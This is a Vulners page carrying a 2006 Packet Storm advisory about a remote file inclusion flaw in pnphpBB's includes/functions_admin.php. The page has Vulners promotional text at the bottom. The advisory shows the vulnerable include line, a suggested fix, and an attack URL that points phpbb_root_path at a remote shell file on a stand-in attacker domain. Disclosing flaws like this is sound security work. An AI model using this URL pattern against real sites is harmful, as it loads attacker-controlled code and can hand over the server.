Lucene search
K

PNphpBB.txt

🗓️ 26 Sep 2006 00:00:00Reported by AzzCoderType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

Vendor's pnphpbb including/functions_admin.php is vulnerable to remote code execution due to uninitialized phpbb_root_path

Code
`Vendor: http://www.pnphpbb.com/  
  
Vulnerable File: includes/functions_admin.php  
  
Vulnerable Code:  
  
//The phpbb_root_path isn't initialize  
  
include_once( $phpbb_root_path . 'includes/functions.' . $phpEx );  
  
Method To Use:  
  
http://www.victim.com/[pn_phpbb]/includes/functions_admin.php?phpbb_root_path=http://yourdomain.com/shell.txt?  
  
How To Fix:  
  
Add this code before the include  
  
if ( !defined('IN_PHPBB') )  
{  
die("Hacking attempt");  
}  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation